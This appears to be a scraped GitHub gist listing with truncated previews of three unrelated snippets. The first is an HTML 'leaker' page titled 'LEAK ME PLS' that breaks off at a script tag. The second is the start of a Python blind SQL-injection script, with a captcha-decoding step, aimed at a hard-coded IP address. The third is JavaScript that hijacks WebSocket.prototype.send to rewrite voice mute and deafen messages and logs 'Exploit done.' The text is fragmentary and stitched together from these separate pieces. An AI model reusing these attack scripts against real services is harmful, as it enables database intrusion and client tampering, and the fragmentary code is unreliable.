This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<title>omakmoh's leaker</title> | |
</head> | |
<h1>LEAK ME PLS</h1> | |
<script type="text/javascript"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests,re,base64 | |
s = requests.session() | |
pat = r'(?<=\:").+?(?=\")' | |
lipos = 0 | |
def sqli(pos,mid): | |
cap = s.get('http://34.175.249.72:60001/scripts/captcha.php') | |
response = cap.text | |
notlatestcap = re.findall(pat, response) | |
verylatestcap = base64.b64decode(notlatestcap[0]).decode("utf-8") | |
veryverylatestcap = base64.b64decode(verylatestcap) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var text = new TextDecoder("utf-8"); | |
WebSocket.prototype.original = WebSocket.prototype.send; | |
WebSocket.prototype.send = function(data) { | |
if (Object.prototype.toString.call(data) === "[object ArrayBuffer]") { | |
if (text.decode(data).includes("self_deaf")) { | |
console.log("Exploit done."); | |
data = data.replace('"self_mute":false', 'dummydata'); | |
} | |
} |